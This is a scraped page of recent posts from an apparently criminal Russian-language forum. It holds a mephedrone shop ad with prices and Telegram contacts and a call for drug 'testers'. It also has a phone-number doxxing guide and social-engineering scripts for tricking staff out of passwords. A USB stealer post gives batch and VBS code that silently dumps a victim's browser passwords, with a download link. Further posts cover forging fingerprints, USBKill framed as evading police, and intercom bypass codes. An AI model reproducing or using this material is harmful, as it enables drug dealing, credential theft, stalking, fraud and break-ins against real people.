Последние сообщения

#21
Здравствуйте, запишусь на пробу, Кишинев
Опыт трип репортов на площадке имеется!)
#23

✨ 🔥 Набор тестеров | 5 проб «mph» | Кишинёв 🔥 ✨

✅ Ищем надёжных ребят для теста топового товара!
📦 Бесплатно выдаём 5 проб на проверку качества.
📍 Город: Кишинёв

💬 Оставляй заявку в теме или пиши в ЛС.
⏳ Кол-во мест ограничено!

⚡ Только реальные отзывы и честный фидбек! ⚡

Список тестеров и трип репорты будут опубликованы тут 👉🏻https://blackmoldova.cc/index.php?topic=283.0

 
#24
😎 Приветствуем в магазине МОНТАНА! 🖤✨
Только топовый меф, быстрый сервис и надёжность без лишних слов! 🚀

💥 ПРАЙС:
🥶 0.5г — 17$
🤯 1г — 27$
💀 2г — 49$
👑 3г  — 68$


📲 Контакты для заказа:
💬 Чат: t.me/+YoM9-TvdWGBiNTU6
📣 Канал: https://t.me/montanasotz
🤖 Бот (авто‑шоп): @MONTANA000bot
👤 Оператор: @montanakishenev

⚡ Работаем 24/7 | Быстро | Качественно | Конфиденциально ⚡
#25

Из-за специфики моей деятельности мне часто нужно знать кому принадлежит тот или иной номер. В моем случае платить бабки пробив сервисам дорого и нецелесообразно, поэтому делюсь своим небольшим гайдом, который работает в 70% случаев и я могу идентифицировать человека по номеру телефона.

Для кого-то этот гайд очевиден, но возможно есть те, кто до этого не додумался.
Гайд для тех, кто не умеет пользоваться поиском по соц. сетям.

Для этого нам нужен телефон на андроиде/ios. А также аккаунты в instagram, whatsapp, viber и telegram. Итак, приступим:

1) Добавляем интересующий нас номер в контакты.

2) Первым делом: Instagram->Ваш профиль->Параметры->Для подписок->Контакты
Если к номеру привязан аккаунт в инстаграме, то этот аккаунт отобразится в этом списке. Если аккаунт привязан, то как минимум у нас есть фотография, которая стоит на аватаре. Как максимум: имя/фамилия, ссылка на вк, фотографии, прочие ссылки и т.д.

Если не привязан, то:
3) WhatsApp (Viber/Telegram)->Контакты->Нужный номер->Профиль. Имеем фотографию, сохраняем ее и идем в поиск по фотографиям google, findface и прочее.
Если найден аккаунт в Instagram, но данные там фейковые, то возможно имя профиля совпадает с профилем в вк, или оно засвечено где-нибудь, то подумайте и ищите, скорее всего что-нибудь да найдете.
Если найден аккаунт в Telegram, то там часто пользователи указывают username, который опять же где-нибудь засвечен.

Если номер никуда не привязан, то идем:
4) Telegram и ищем там AVInfoBot (штука интересная, имеет ряд возможностей, которые я расписывать не буду, посмотрите сами). ****аем номер, получаем инфу. Иногда через него мне удавалось установить ФИО полностью и фамилию/имя (далее поиск в вк и т.д). А также информацию о том, что он продает/продавал.

5) Ресурс phonenumber.to. ****аем туда номер и ищем. Если искали через AVInfoBot, то можно этот шаг пропустить, так как он ищет номера и через этот ресурс в том числе.

Если ничего не нашли:
6) Поиск в google/яндекс по запросу: 9993334455 | "9993334455" | "(999)3334455" | "89993334455" | "8 999 3334455" | "8(999)3334455" | "8 999 333 44 55" | "8(999)333-44-55" | "79993334455" | "7 999 3334455" | "7(999)3334455" | "7 999 333 44 55" | "7(999)333-44-55

На этом поиск я заканчиваю.
Было бы интересно узнать как вы пробиваете человека по номеру телефона
#26



Наверняка все в детстве баловались с телефонами. Ну кто не знает таких шуток, как: "Алло, это зоопарк?" - "Нет". - "А почему обезьяна у телефона?". Совершенно безобидный пример издевательства над людьми. А вот еще один подобный пример, но с элементами СИ:

Шутник: Алло! Вас беспокоят с телефонной станции. Измерьте, пожалуйста, длину шнура от трубки к телефону.
Жертва: Метр.
Ш.: Хорошо, для того, чтобы повеситься, хватит.
Следующий звонок.
Ш.: Алло! Это милиция. Вам сейчас хулиганы не звонили?
Ж.: Да, да! Звонили! Разберитесь с ними, пожалуйста!
Ш.: Про трубку и провод спрашивали?
Ж.: Да!
Ш.: И он у вас метр?
Ж.: Да!
Ш.: А почему до сих пор не висим?

Это было лирическое отступление на тему того, как методы СИ используются детьми на бессознательном уровне, в качестве шутки. Рассмотрим простейший пример СИ для проникновения в систему.

Звонок администратору системы.
Взломщик: Здравствуйте, вы администратор?
Администратор: Да.
В.: Я понимаю, что вы ужасно заняты, извините, что отрываю вас от дел, по я не могу войти в сеть.
А.: (Про себя: ЕПРСТ!!! Поработать не дают!) А что компьютер говорит по этому поводу?
В.: Как это - "говорит"???
А.: (Ха!) Ну, что там написано?
В.: Написано "вронг пассворд".
А.: (Ну-ну, еще бы...) А-а-а-а... А вы пароль правильно набираете?
В.: Не знаю, я его не совсем помню.
А.: Какое имя пользователя?
В.: anatoly.
А.: Ладно, ставлю вам пароль... мммм... art25. Запомнили? (Если опять не войдет - убью!)
В.: Постараюсь... Спасибо. (Вот дурак-то!)
Конец разговора. Все!

На самом деле это упрощение ситуации, но в некоторых случаях такое может сработать. Какие ошибки допустил администратор? С его точки зрения - никаких. В подобных случаях редко спрашиваются имя, фамилия, должность звонящего, особенно если звонит девушка с приятным голосом (для этого и используются преобразователи голоса). Администраторы часто сталкиваются с забывчивостью пользователей, особенно если сотрудники редко "входят" в систему. В таких случаях ответственное лицо старается побыстрее положить трубку, и ему хватает того, что пользователь знает свое имя входа в систему. Однако в этом случае взломщик уже знал некоторые сведения о своей цели. Рассмотрим пример с первоначальными нулевыми знаниями.
Выберем цель по телефонной книге - организацию, где есть телефон секретаря.
Звоним секретарю и узнаем имя персоны, с которой можно проконсультироваться по поводу некоторых проблем с работой системы.
Звоним любому другому человеку, чей номер телефона имеется в книге, предполагая, что он имеет доступ к системе.
Представляемся (разумеется, вымышленным именем) как помощник той персоны, имя которой мы узнали из первого звонка. Говорим, что в связи с перестановкой системы администратор дал задание поменять пароли всем пользователям.
Узнаем имя входа, прежний пароль, говорим новый пароль. Все!
В том случае, если доступ к системе происходит посредством телефонных линий, звоним секретарю, говорим, что не получается дозвониться до системы, и просим назвать правильный номер телефона. В принципе этот пример немногим отличается от предыдущего, но есть большая вероятность получения доступа в систему вследствие оперирования в разговоре конкретными именами и должностями.

После того как взломщик получает доступ к системе в виде простого пользователя, ему не составляет большого труда получить полное право на нее с помощью тех способов, которые описаны в главе 9. Но можно и дальше развить СИ для получения привилегий администратора. Вот пример на UNIX-системе.

Пусть каким-либо образом взломщик узнал, что у администраторе в переменную окружения PATH включена "." (это значит выполнение программ из текущего каталога, многие так делают для удобства работы)

Звонок администратору.
Хакер: Здравствуйте, вы администратор?
Администратор: Да.
X.: Извините, что отвлекаю. Не могли бы вы мне помочь?
А.: (Ну что еще ему надо?) Да, конечно.
X.: Я не могу в своем каталоге выполнить команду ls.
А.: (Как будто ему это надо!) В каком каталоге?
X.: /home/anatoly.
А.: (Вот ведь глупый юзер!) Сейчас посмотрю. (Заходит в этот каталог и набирает команду ls, которая успешно выполняется и показывает наличие нормальных прав на каталог.)
А.: Все у вас должно работать!
X.: Хммм... Подождите... О! А теперь работает... Странно...
А.: (Рррррр!!!) Да? Хорошо!
X.: Спасибо огромное. Еще раз извиняюсь, что помешал.
А.: (Ну наконец!) Да не за что. (Отстань, противный!) До свидания.
Конец разговора.

Заметили криминал? Вроде бы ничего особенного. Даже с точки зрения опытного администратора. Что же произошло на самом деле? В каталоге /home/anatoly среди множества других файлов лежал измененный вариант программы ls. Как раз его-то администратор и запустил. Все дело в том, что при выполнении этого файла у запускающего (администратора) имелись все права на систему, и, соответственно, все программы, которые он запускает, могут делать с системой практически все, что угодно. Что было в этом файле, кроме возможности показывать список файлов в каталоге, теперь только взломщику и известно.

Разумеется, эти случаи годятся для организации со средним уровнем защиты. В банках или военных учреждениях наверняка так просто ничего не получится. Там могут спросить имя звонящего, его адрес, номер паспорта или предложат оставить номер телефона для последующего уведомления о смене пароля (для этого и нужна возможность использовать чужую линию, чего позволяют добиться офисные мини-АТС, которыми можно оперировать с удаленного терминала или из сети Internet). В таком случае взломщики обычно заранее собирают информацию о потенциальных жертвах. Как это делается? Пожалуйста, еще один пример из телефонных шуток.

Звонок на совершенно незнакомый номер.
Взломщик: Алло, извините, вас беспокоят с телефонной станции. Это номер такой-то?
Жертва: Да.
В.: У нас идет перерегистрация абонентов, не могли бы вы сообщить, на кого у вас зарегистрирован телефон? Имя, фамилию и отчество, пожалуйста.
Ж.: (Говорит информацию.)
В.: Спасибо! Так... секундочку... Хорошо, ничего не изменилось. А место работы?
Ж.: (С некоторым сомнением называет, а если человек очень подозрительный, то спрашивает, зачем.)
В.: Это сведения для новой телефонной книги. По вашему желанию можем внести не одно имя, а всех, кого можно найти по этому телефону.
Ж.: (Тут с радостью называются имена всех членов семьи с их положением в ней, хотя это и не требовалось.)

Информации уже достаточно для попытки взлома. Таким же образом становятся известными номера паспортов и т. д. После такого разговора можно звонить сотрудникам хозяина телефона от имени его родственников и получать дальнейшую информацию.

Еще один пример.
Взломщик: Алло, это приемная?
Жертва: Да.
В.: Это администрация сети. Мы сейчас меняли сетевую систему защиты. Необходимо проверить, все ли у вас нормально работает. Как вы обычно регистрируетесь в системе?
Ж.: Ввожу свои имя и пароль.
В.: Хорошо... Так... (Пауза) Какое имя?
Ж.: anna.
В.: Анна... (Пауза) Так... какой у вас раньше был пароль?
Ж.: ienb48.
В.: Та-а-а-ак... Хорошо. Попробуйте сейчас перерегистрироваться.
Ж.: (Пауза) Все нормально. Работает.
В.: Отлично. Спасибо!

Разумеется, в маленьких организациях, где все знают администратора, это не сработает, зато в больших есть пространство для применения своих способностей.

Вот как использовали СИ такие люди, как Кевин Митник и Роско: "И Роско, и Кевин гордились своим умением общаться с людьми. На их взгляд, в любом разговоре можно было подчинить себе собеседника, если говорить авторитетным тоном знатока, даже если в этой области ты ничего не смыслишь. Время от времени они названивали в отдел дистанционной связи какой-нибудь компании и недовольным начальственным голосом требовали объяснить, почему тот или иной номер АТС не удается набрать из города. И напуганный оператор объяснял им, как набрать интересующий их номер.

Обычно в таких случаях Кевин предпочитал импровизировать, полагаясь на свою интуицию, а Роско возвел свое умение разговаривать с людьми чуть ли не в ранг искусства. Он вел специальную записную книжку, куда вписывал имена и должности телефонисток и операторов разных фирм и их начальников. Там же он помечал, новички они или опытные работники, насколько хорошо информированы, расположены к разговорам или нет. Заносил он в книжку и сведения, так сказать, личного характера, добытые в течение долгих часов разговоров по телефону: увлечения, имена детей, любимые виды спорта и места, где они любят бывать в отпуске и по выходным" [5].

В некоторых источниках предлагается ходить с видеокамерой, изображая репортера, и почаще наводить ее на клавиатуру пользователей. Здесь сработает предположение, что людям наверняка захочется увидеть себя по телевизору. Можно даже попросить человека сделать вид, что он только что пришел на работу и садится за компьютер... Ну и, разумеется, попросить включить его и начать работу.
#27
Безопасность в интернете / Крадем все пассы или USB Steal...
Последний ответ от bratva - Июль 07, 2025, 11:29
Крадем все пассы или USB Stealer на коленке :D


Всем привет друзья! В этой статье я расскажу вам как с помощью небольшой социальной инженерии и стиллера, спиздить все пассы с браузеров а так же историю. Прошу прощения.. если весь софт и сам способ - БАЯН. Я не крал эту статью. НАШЕЛ - СОФТ, написал батник, и скрипт VBS. В итоге получился вот такой вот стиллер. Ниже я прикреплю ссылку на скачивание архива.. и на сканер VT. Софт старенький так что даже AVAST его видит как вирус.. только потому что софт просматривает куки браузера. Качать.. запускать.. тестить.. это всё на ваше усмотрение! Ну чтож.. начнём)

Пароли крадутся с браузеров Chrome, Opera, Firefox, IE. Так же пассы от роутера.. но это не точно я не проверял!

- Пройдемся по содержанию архива.

В корневой папке у нас есть 2 файла это usbs.bat и usbs.vbs. USBS.BAT - Это основной исполняющий файл.
Вот его код:

[USER=98981]@Echo[/USER] off

FOR %%A IN (%Date:/=%) DO SET Today=%%A
for /l %%a in (1,1,1) do if "!Today:~-1!"==" " set Today=!Today:~0,-1!
SET dynpathname=%TODAY%_%COMPUTERNAME%_%USERNAME%.txt

start usbs/WebBrowserPassView.exe /stext usbs/log/webbrowserpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/routerpassview.exe /stext usbs/log/routerpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/iepv.exe /stext usbs/log/iepv_%DYNPATHNAME%
start usbs/chromehistoryview.exe /stext usbs/log/chromehistoryview_%DYNPATHNAME%

ping -n 5 127.0.0.1 > nul

exit

Файл USBS.VBS - Является исполняемым.. он нужен для беспалевного запуска батника.
Вот его код:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "usbs.bat" & Chr(34), 0
Set WshShell = Nothing


В папочке USBS - у нас лежит весь исполняемый софт. И самое главное подпапка LOG - вот как раз в этой самой папочке и сохраняются все куки и история жертвы.

По моему.. всё.. нечего не забыл.

- Хочу сразу отметить то что кражу лучше производить следующим образом.
1. Скидываем все файлы из архива на флэшку.
2. Скрываем все файлы с помощью меню "Свойства".
3. И тут правило 5 секунд, пока жертва нихуя не видит, через адресную строку пишем следующее.. "БУКВА_USB:/usbs.vbs".

НЕ СТОИТ ЗАПУСКАТЬ БАТНИК, ТАК КАК ВЫЛЕЗЕТ КОНСОЛЬ!

Готово! Теперь все файлы куки и история хранятся в папочке USBS/LOG

VT: https://www.virustotal.com/ru/file/...87814a7935a89585db22b24c/analysis/1516688620/
СКАЧАТЬ: https://mega.nz/#!8K5XiD4D!YSxo-MY8KH0TU1dnw7bvsF3fgraoadu3Jr7zBrBvhgY

Пароль на архив: lolzteam.org
#28


) изображение отпечатка, желательно в хорошей резолюции;
2) лазерный принтер;
3) фотополимер (например Verbatim VX40 или ему подобный);
4) пленка для лазерного принтера;
5) два стекла с ровной поверхностью, размеры не принципиальны, главное чтобы они покрывали весь отпечаток;
6) настольный светильник с УФ лампой + пачка стирального порошка;
7) фотошоп и клей момент.

Все выше указанное можно приобрести в свободной продаже.

Результат представляет собой тонкую пленку (основу) из полимера, на которую нанесен рельеф в виде отпечатка.

Для начала займемся изображением отпечатка, находим изображение с помощью гугла или любого другого поисковика

В фотошопе делаем выравнивание, подгонку размеров и преобразуем изображение в черно-белый негатив

Печатаем это дело на пленке для лазерного принтера и вырезаем. Из той же пленки вырезаем небольшой кусок размером примерно 5х5 см.

Далее берем целлофан от пачки сигарет и вырезаем еще один кусок размером 5х5см или около того в итоге, у нас получилось три куска пленки, одна с напечатанным на ней негативом и две прозрачные (одна – толстая, пленка для лазерника, вторая - тоненькая от сигаретной пачки).

Затем берем первое из двух стекол, кладем или ложем, кому как больше нравится, на него, кусок пленки для лазерника и капаем пару капель фотополимера в центр пленки

Накрываем все это сверху тонкой пленкой и прижимаем вторым стеклом.

И экспонируем данный бутерброд под УФ лампой минут десять. Фотополимер в обычном состоянии это вязкая, абсолютно прозрачная жидкость, после воздействия на него ультрафиолетом он «застывает» становясь похожим на прозрачную резину или застывший силикон-герметик.

Через десять минут достаем то, что получилось и отрываем тоненькую пленку от сигаретной пачки.

У нас остается толстая пленка от лазерника на которой находится слой полимера (основа). Сверху, по центру, капаем еще пару капель фотополимера и накладываем негатив.

Накрываем все это вторым стеклом, полученный бутер опять отправляем под УФ но уже на 2,5 (две с половиной) минуты.

Ультрафиолет проходя через прозрачные участки негатива отверждает фотополимер по форме рисунка на негативе. Далее, ответственный момент, надо аккуратно отделить основу от негатива.

На основе из полимера, которую мы получили после первой экспозиции, мы видим получившийся рельеф, остается только промыть основу с рельефом от остатков не затвердевшего фотополимера.

Для промывки используем теплую воду, фейри и зубную щетку.

В принципе все готово, но мы пойдем правильным путем и не будем спешить, погрузим то, что получилось, в кювету с водой и отправим на окончательную засветку.

Окончательная засветка придаст готовому изделию механическую прочность, долговечность и отсутствие остаточной адгезии. После окончательной, 10ти минутной засветки сушим и вырезаем отпечаток.

Вырезанный отпечаток на основе отделяем от толстой пленки для лазерника, мажем свой палец клеем «Момент» даем немного подсохнуть и приклеиваем новый отпечаток на палец.
#29
Компьютеры / USBKill - отличный скрипт для ...
Последний ответ от bratva - Июль 05, 2025, 09:51

О необходимости использования USBkill

Шифрование диска - лишь один из шагов к безопасности. Как правило спецслужбы действуют следующим образом: поджидают жертву, чтобы та не успела выключить компьютер до момента задержания. Даже lockscreen не убережёт вас, потому как ключи шифрования можно извлечь при загруженной ОС специальными устройствами из ОЗУ имея физический доступ к USB-портам. Эту проблему решает скрипт USBkill github.com/hephaest0s/usbkill



Принцип работы

В скрипте можно указать белый список ваших USB-устройств, а постоянно запущенный процесс следит за портами USB, и если туда что-то вставят, сразу выключает, перезагружает, либо переводит в спящий режим ваш компьютер (на выбор, задаётся в скрипте). В каком-то смысле, это мини-средство против криминалистической экспертизы. Таким образом можно избежать криминалистической экспертизы. Разумеется, при условии что жёсткий диск компьютера предварительно зашифрован.

1) Если пользователь полностью зашифровал свой жесткий диск, а при аресте успел выдернуть флэшку (чем вызвал выключение компьютера), что гораздо быстрее чем искать в интерфейсе всякие кнопки «Завершить работу», то полиции потребуется существенное время и усилия, чтобы получить доступ к данным. Естественно, если шифрование диска не включено, то это средство бесполезно, поскольку даже не зная пароль, достать данные с незашифрованного диска весьма просто. Для этого правда, вероятно придется пристегивать флэшку каким-то шнуром к руке, чтобы облегчить самому себе процесс «доставания» флэшки в случае ареста.

2) Другой возможный сценарий – это защита от взлома, когда кто-то со злонамеренными целями вставляет в ваш компьютер (без вашего ведома) флэшку, чтобы произвести взлом или заразить вирусом, то такой скрипт также выключит компьютер и при вставлении другой флэшки.

Например, можно носить USB-флешку на запястье и подключать ее только тогда, когда вам нужно запустить usbkill. Если у вас силой отбирают ноутбук, флешка будет вынута из порта и обрушит систему. Это как будто кнопка самоуничтожения.

Для запуска выполнить команду:

sudo python usbkill.py
или
sudo python3 usbkill.py
#30

Бывало ли у вас такое, что вы оставляли ключи дома, вам нужно было попасть в подъезд, но у вас не было ключа от домофона. Начнем.

Домофон Vizit
Для того чтобы открыть домофон vizit, требуется немного больше усилий, чем для открытия любого другого домофона. Коды отличаются разнообразием, а на клавиатуре иногда вместо клавиши «*» используется «С», а вместо «#» - «К».

Виды домофонов VIZIT
Для открытия двери необходимо использовать коды: «*#4230», «12#345», для недавно установленных домофонов часто подходят коды «*#423» и «67#890».

Также можно открыть дверь с помощью сервисного меню. Для этого необходимо:

Войти в меню, набрав «#999»;

После двух сигналов ввести код «1234», дождаться короткого писка;

Если характерный писк отсутствует и слышен двухтональный сигнал, то можно попробовать набрать другие стандартные коды: «6767», «3535», «9999», «12345» или «11639»;

После этого необходимо ввести комбинацию «2 – пауза - # - пауза - 3535».

Домофон Метаком

Нажать кнопку «В» - номер квартиры, которая является первой в этом подъезде – «В» (появится «COD») – код 5702;

Набрать код 65535 – кнопка «В» - 1234 – «В» - 8;

Или этот код: 1234 - «В» - 6 - «В» - 4568.

Для модели домофона МК-20 М/Т можно использовать коды: «В» - 27 - «В» - 5702 или «В» - 1 - «В» - 4526.

Домофон Eltis

Домофоны марки Eltis достаточно просты в открытии.

Можно использовать один из двух кодов, которые помогут аккуратно взломать домофон:

Вызов – 100 – вызов – 7273;

Вызов – 100 – вызов – 2323.

Домофон Cyfral

Для домофонов, установленных в подъездах, где расположены квартиры с круглыми номерами (100, 200, 300 и т.д.), можно использовать код: «вызов – код 1 – вызов – код 2». «Код 1» обозначает номер квартиры (100, 200 и т.д.), а «код 2» - это код домофона «2323», «7272» или «7273».

Для домофона, в маркировке которого имеется буква «М», можно использовать код: «вызов – 41 – вызов – 1410». Некоторые двери открываются при использовании кода «07054».

Домофоны модели CCD – 2094.1M можно открыть набором кода «вызов – 0000», который либо сразу откроет дверь, либо даст вам доступ в меню (на дисплее появится «ON»). Далее нажмите «2» - дверь откроется. Если появится «OFF», то это означает, что коды доступа были изменены установщиком при монтаже.

Для домофона модели CCD – 2094M введите код «0000 – вызов». После появления «cod», ввести код «123456 – вызов» или «456999 – вызов». Можно также использовать код «123400 – вызов». После появления надписи «f0», введите код «601».

Пользуйтесь полученными знаниями с умом, поскольку применение кодов ради личной выгоды уголовно наказуемо.
Powered by SMFPacks Reactions Mod